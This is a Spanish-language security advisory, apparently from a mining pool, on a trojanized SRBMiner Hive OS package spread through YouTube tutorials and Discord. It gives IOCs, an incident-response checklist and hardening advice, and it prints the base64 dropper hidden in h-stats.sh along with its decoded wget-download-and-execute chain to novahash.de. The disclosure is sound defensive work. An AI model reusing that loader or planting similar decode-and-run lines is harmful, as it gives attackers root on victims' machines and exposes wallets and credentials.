Paquete SRBMiner 3.2.5 troyanizado en circulación
Lo que los mineros necesitan saber, en el orden en que les va a importar

IOCs — para quien solo quiere hacer grep

Todo lo que un defensor necesita en un único bloque. Más detalle abajo, pero si vienes a auditar tu flota, empieza aquí.

Los artefactos en disco los limpia el dropper tras cada ejecución, por lo que su ausencia no te exonera. Solo su presencia es concluyente. Juzga a partir de logs, del contenido de h-stats.sh en disco y del tráfico saliente hacia novahash.de.

Vector de distribución

El paquete se ofrece desde dos puntos de distribución distintos controlados por el atacante — con al menos una capa de staging adicional en un servicio público tipo pastebin. Los tres alojan el mismo srbminer-3.2.5.tar.gz troyanizado, y los tres están elegidos para parecer recursos genéricos de la comunidad ante un operador que busca binarios de mineros:

Distribución: tutoriales de YouTube y siembra en Discord (observado)

El archivo troyanizado no está esperando en un dominio al azar a que alguien tropiece con él. Se está promocionando activamente a través de canales en los que los mineros confían, y la capa de promoción es más amplia y deliberada de lo que describía el aviso original del 17 de abril de 2026. A día 19 de abril de 2026 el panorama es el siguiente:

Qué nos dice esto sobre el modus operandi del atacante

Esto es ingeniería social, no una descarga drive-by. Cada paso del proceso está elegido a propósito para bajar la guardia de la víctima:

1. Elegir monedas pequeñas con Discords activos y un goteo constante de recién llegados. C64Chain, QTC, una moneda de nicho con más recorrido como Vertcoin o una micro-cap recién salida como LuckyPepe (LPEPE) son justo el tipo de objetivo en el que un minero novato aterriza en el Discord, pregunta cómo empezar y acepta agradecido el primer enlace que alguien servicial le da. Las monedas grandes reciben más escrutinio; las pequeñas, más confianza; las recién salidas, prácticamente ningún escrutinio.
2. Producir un tutorial que realmente funcione. Los vídeos de YouTube muestran rigs que efectivamente minan, porque el binario del minero en el archivo es un minero real y funcional (cobertura) y el campo url del flightsheet apunta a un pool de terceros real y operativo. La prueba visual convence — un vídeo con shares aceptados entrando vale más que mil «confía en mí».
3. Abusar de hosting de confianza. Apuntar el install_url a una URL de contenido raw de GitLab (gitlab.com/hiveos-custom/m) y alojar el JSON del flightsheet en un servicio pastebin adyacente a GitLab (anotepad.com). El host de descarga es infraestructura de primer nivel; el host del flightsheet es un acortador de URL con otro nombre. Ninguno de los dos va a levantar sospechas a un recién llegado curioso.
4. Primero acumular reputación, luego armar. Una vez que el vídeo existe, se le suman más vídeos en el mismo canal y unos cuantos comentarios dicen «me ha funcionado, gracias», el enlace se alimenta a sí mismo — cada nuevo espectador ve prueba social antes de ver un motivo para desconfiar.
5. Sembrar en canales de principiantes. Soltar el enlace de anotepad o del archivo en canales de Discord donde los novatos piden ayuda de configuración. La carga se ejecuta en el primer poll de estadísticas; el atacante no necesita nada más de la víctima que «sigue el tutorial».
6. Contar con que los moderadores no auditan archivos ni flightsheets. Prácticamente ningún Discord de moneda tiene recursos para hacer ingeniería inversa a cada archivo «útil» publicado en su canal de minería, ni para comparar el wal_id de un flightsheet compartido con el operador que lo publicó. Un usuario simpático con canal de YouTube parece un miembro de la comunidad, no una amenaza.
7. Rotar los artefactos, mantener el canal. La nota de anotepad se puede editar en cualquier momento — el identificador de wallet, la URL del pool, el install_url pueden cambiar en segundos. El canal de YouTube es el activo duradero; el enlace de anotepad dentro de la descripción de cada vídeo es el mecanismo que dirige el tráfico. Los takedowns de hosts de archivos concretos no rompen la campaña mientras el canal siga en pie.

Si formas parte de la comunidad de C64Chain, Qubit (QTC), Vertcoin (VTC) o LuckyPepe (LPEPE) y configuraste un rig desde alguno de los tutoriales de Argenminer, o pasaste el enlace a alguien — comparte este aviso con la comunidad y considera como comprometido cualquier rig montado desde cualquiera de esas guías.

Contenido del archivo

El archivo es una integración completa de minero personalizado para Hive OS, con una integración de Minerstat (mmp-*) colada dentro por buena medida. Las distribuciones auténticas entregan una o la otra, no ambas — así que el mero hecho de encontrarlas juntas ya delata el paquete.

Pistas de reempaquetado

Ninguno de los siguientes rasgos es malicioso en sí mismo — son las pistas diagnósticas que muestran que el paquete no viene de donde afirma venir:

• Comentarios en español en h-run.sh y h-manifest.conf — p. ej. «Verificar si ya está corriendo», «Cargar manifest», «Ejecutar el binario con parámetros», «Nombre del miner», «Ruta al archivo de configuración». Las integraciones oficiales de SRBMiner están en inglés.
• Incoherencia de versión interna. h-manifest.conf declara CUSTOM_VERSION=3.2.5; mmp-external.conf declara EXTERNAL_VERSION="2.6.8-custom". Los paquetes auténticos son coherentes internamente. Este no logra cuadrar su propia historia.
• Integraciones Hive y Minerstat juntas. Upstream envía una o la otra, nunca ambas.
• Binario no strippeado. Los binarios de release upstream se strippean para reducir tamaño y dificultar el análisis. Este no — señal fuerte de que el atacante reconstruyó desde código fuente en vez de reempaquetar la release oficial.

La carga: h-stats.sh

La mayor parte de h-stats.sh es, molestamente, un parser de estadísticas de Hive OS perfectamente funcional. Consulta la API HTTP del minero en 127.0.0.1:$MINER_API_PORT, parsea hashrate, shares, temperaturas y velocidades de ventilador para workers de GPU y CPU, gestiona minería mono y dual-algoritmo, y devuelve un JSON de estadísticas válido al agente Hive. No es casual: es la cobertura. Si el script fallara, Hive mostraría el rig como offline y el operador investigaría en minutos.

Añadido después de la lógica legítima de estadísticas y antes de las asignaciones de fallback, aparece este bloque:

p="bm9odXAgc3VkbyB3Z2V0IC1xIGh0dHBzOi8vbm92YWhhc2guZGUvZmlsZXNsYWIvcmVjdWFpa2Fhbi5wbmcg
LU8gL2V0Yy9yZWN1YWlrYWFuLnppcCAmJiBzdWRvIHVuemlwIC1xIC1vIC9ldGMvcmVjdWFpa2Fhbi56aXAgLWQg
L2V0YyAmJiBzdWRvIGJhc2ggL2V0Yy9yZWN1YWlrYWFuLnNoIDsgc3VkbyB3Z2V0IC1xIGh0dHBzOi8vbm92YWhh
c2guZGUvZmlsZXNsYWIvbXF0YXRvLWZsYS5qcGcgLU8gL2V0Yy9tcXRhdG8tZmxhLnppcCAmJiB1bnppcCAtcSAt
byAvZXRjL21xdGF0by1mbGEuemlwIC1kIC9ldGMgJiYgYmFzaCAvZXRjL21xdGF0by1mbGEuc2ggOyBybSAvZXRj
L21xdGF0by1mbGEuemlwIDsgcm0gL2V0Yy9tcXRhdG8tZmxhLnNoIDsgcm0gL2V0Yy9yZWN1YWlrYWFuLnNoIDsg
cm0gL2V0Yy9yZWN1YWlrYWFuLnppcCA+IC9kZXYvbnVsbCAyPiYxICY="
nohup sh -c "$(echo "$p" | base64 -d)" > /dev/null 2>&1 &

Decodificada, la carga base64 es:

nohup sudo wget -q https://novahash.de/fileslab/recuaikaan.png -O /etc/recuaikaan.zip \
  && sudo unzip -q -o /etc/recuaikaan.zip -d /etc \
  && sudo bash /etc/recuaikaan.sh ; \
sudo wget -q https://novahash.de/fileslab/mqtato-fla.jpg -O /etc/mqtato-fla.zip \
  && unzip -q -o /etc/mqtato-fla.zip -d /etc \
  && bash /etc/mqtato-fla.sh ; \
rm /etc/mqtato-fla.zip ; rm /etc/mqtato-fla.sh ; \
rm /etc/recuaikaan.sh ; rm /etc/recuaikaan.zip > /dev/null 2>&1 &

Comportamiento, paso a paso

1. Se descargan dos supuestos archivos de imagen (.png y .jpg) mediante wget desde novahash.de. Las extensiones de imagen son camuflaje: el contenido real son archivos ZIP. Técnica conocida para sortear filtros de egress ingenuos que inspeccionan tráfico de scripts y archivos pero dejan pasar imágenes.
2. Cada archivo se escribe en /etc/, se renombra a .zip y se extrae en el mismo sitio con unzip -o (sobrescritura).
3. Cada archivo contiene un script shell (recuaikaan.sh, mqtato-fla.sh) que luego se ejecuta — el primero explícitamente con sudo, el segundo apoyándose en el contexto de root ya establecido por el agente Hive.
4. Los cuatro artefactos (ambos .zip y ambos .sh) se eliminan luego de /etc/. Esto limpia la huella del dropper: una inspección forense de /etc/ posterior no encuentra nada, mientras que lo que los scripts de segunda etapa hayan instalado en otro sitio permanece residente.
5. La cadena entera corre en segundo plano vía nohup … &, por lo que la salida legítima de estadísticas ni se bloquea ni se retrasa. Hive sigue viendo un rig saludable.

Por qué h-stats.sh es el punto de inyección perfecto

El minero de cobertura: srbminer_bin

El binario incluido parece una build legítima o casi legítima de SRBMiner-Multi. Su trabajo, desde el punto de vista del atacante, es no llamar la atención:

• Archivo: ELF 64-bit LSB shared object, x86-64, enlazado dinámicamente.
• Tamaño: 20 309 184 bytes (~20 MB).
• SHA256: 9d69228bce9ad3f1cde0f7fa0141e7588922227ee67b3c3f12788a0429909d06
• BuildID: fc2487ec223c91039748e53c08328af91260cd8c
• Strippeado: No (atípico para una release upstream — esas sí están strippeadas).
• Rutas de build embebidas: referencian /home/doktor/VSCode/SRBMiner-Multi/Libs/{clew,libmicrohttpd,libressl,hwloc}/linux, que son las rutas reales del entorno del autor de SRBMiner (doktor83). Consistente con una build desde código genuino o ligeramente modificado.
• URLs embebidas: ninguna. Sin referencias a novahash.de ni a los nombres de los archivos del dropper.

El plan del atacante depende de que el minero produzca hashrate y shares plausibles para que los dashboards de Hive y Minerstat se vean normales y el operador no tenga motivos para investigar. Toda la funcionalidad maliciosa observada está en h-stats.sh; el binario no es el vector de ataque.

Indicadores de compromiso completos

Red

• Dominio C2 de segunda etapa: novahash.de — bloquear en firewall y DNS
• https://novahash.de/fileslab/recuaikaan.png
• https://novahash.de/fileslab/mqtato-fla.jpg
• Dominio de distribución (original): miningrepositories.blog
• Espejo de distribución (GitLab): gitlab.com/hiveos-custom/m — concretamente https://gitlab.com/hiveos-custom/m/-/raw/main/srbminer-3.2.5.tar.gz
• Página de instrucciones controlada por el atacante: https://anotepad.com/notes/a7ycensj (el contenido rota; el IOC estable es la URL)

Canal de promoción / ingeniería social

• Canal de YouTube: https://www.youtube.com/@Argenminer — varios vídeos de tutorial activos para distintas monedas pequeñas, cada uno apuntando a una nota de staging de anotepad específica de la moneda y, a través de ella, al archivo troyanizado
• Vídeo conocido (VTC): https://www.youtube.com/watch?v=Id3nMIt18EE — «VERTCOIN ! Top GPU Mining | HIVEOS Easy Flight Sheet Tutorial Pool & Wallet.»
• Vídeo conocido (LPEPE): https://www.youtube.com/watch?v=xiA81jvYFJs — «LUCKYPEPE! New GPU/CPU Mining Coin! HIVEOS Easy Flight Sheet Tutorial Pool & Wallet!»
• Comunidades objetivo hasta ahora: C64Chain, Qubit (QTC), Vertcoin (VTC), LuckyPepe (LPEPE)
• Identificador de wallet en el flightsheet VTC capturado: CoinEx, wal_id: 11032492 — trata como decorado, no como IOC financiero del atacante: el malware es un dropper a nivel de root, no un cryptojacker, y los campos de wallet/pool de la configuración de minería son puro teatro

Archivos (artefactos del dropper)

Eliminados por el propio dropper tras ejecutarse — su ausencia no exculpa:

/etc/recuaikaan.png
/etc/recuaikaan.zip
/etc/recuaikaan.sh
/etc/mqtato-fla.jpg
/etc/mqtato-fla.zip
/etc/mqtato-fla.sh

Hashes de archivo

• srbminer_bin SHA256: 9d69228bce9ad3f1cde0f7fa0141e7588922227ee67b3c3f12788a0429909d06
• srbminer_bin BuildID: fc2487ec223c91039748e53c08328af91260cd8c

Firmas de proceso y comportamiento

• Llamadas wget a novahash.de desde la cuenta Hive user o desde root
• Invocaciones nohup sh -c lanzadas desde h-stats.sh
• Entradas sudo bash /etc/*.sh en logs de sudo (si hay auditoría)
• Archivos .zip, .png o .jpg inusuales apareciendo en /etc/ en cualquier momento

Señales a nivel de paquete (útiles para detectar otros troyanizados)

• Comentarios en español en scripts de integración Hive o Minerstat que upstream entrega en inglés
• Incoherencias de versión entre archivos manifiesto
• Binarios de release no strippeados
• Integraciones Hive y Minerstat juntas en un mismo paquete
• Cadenas base64 largas en cualquier h-*.sh o mmp-*.sh
• base64 -d | sh, base64 -d | bash, xxd -r -p | sh o pipelines similares de decodificar-y-ejecutar en scripts de stats o run

Checklist de respuesta a incidentes

Si instalaste el paquete en cualquier rig o servidor, recorre los siguientes pasos en orden. Con un leve punto de mal humor. Es la postura emocional adecuada.

ls -la /etc/recuaikaan* /etc/mqtato* 2>/dev/null

cat /etc/ld.so.preload   # debe estar vacío o no existir

find /etc /usr/local/bin /usr/local/sbin /root /tmp /var/tmp /dev/shm \
     -mtime -30 -type f -ls 2>/dev/null

crontab -l
for u in $(cut -f1 -d: /etc/passwd); do crontab -u "$u" -l 2>/dev/null; done
ls -la /etc/cron.* /etc/cron.d/ /var/spool/cron/
systemctl list-unit-files --state=enabled
systemctl list-timers --all

find / -name "authorized_keys" 2>/dev/null -exec ls -la {} \; -exec cat {} \;
grep -E '^(PermitRootLogin|PasswordAuthentication|AuthorizedKeysFile)' /etc/ssh/sshd_config

ss -tnp | grep -E '(srbminer|sh|wget|curl)'

chkrootkit
rkhunter --check --skip-keypress

grep -E 'wget|bash /etc' /var/log/auth.log /var/log/secure 2>/dev/null

Endurecimiento: cómo no acabar aquí

Algunas costumbres que habrían evitado todo esto de raíz. Ninguna es novedosa; todas son aburridas; lo aburrido es justamente lo que buscamos.

Una nota de Suprnova

Los operadores de pools y sus mineros son una población objetivo muy atractiva para este tipo de ataque. Un minero troyanizado en un rig no es cryptojacking — es peor. En cuanto el dropper tiene root, puede rastrear el disco en busca de archivos de seed de wallet y keystores respaldados, sacar credenciales de pool y claves SSH de los archivos de configuración, cosechar sesiones de navegador, enrolar el rig en una botnet o en un pool de proxies residenciales, y pivotar hacia el resto de tu infraestructura. La carcasa con forma de minero es solo la tapa de la caja; lo que de verdad le interesa al atacante es todo lo que hay dentro. Nuestros usuarios son, de media, más técnicos, más valiosos y más específicamente objetivo que la población general de «gente que descarga cosas», y esa atención, en balance, no es un cumplido.

Si te topas con una descarga de minero sospechosa, un archivo inusual o un DM de Discord/Telegram promocionando un minero «custom» o «patched», por favor reénvíalo a admin@suprnova.cc o déjalo en nuestro Discord. Lo miraremos, actualizaremos este aviso si hace falta y avisaremos al resto de la comunidad. Cinturón, tirantes y un toque de paranoia compartida — los tres pilares de un rig de minado feliz.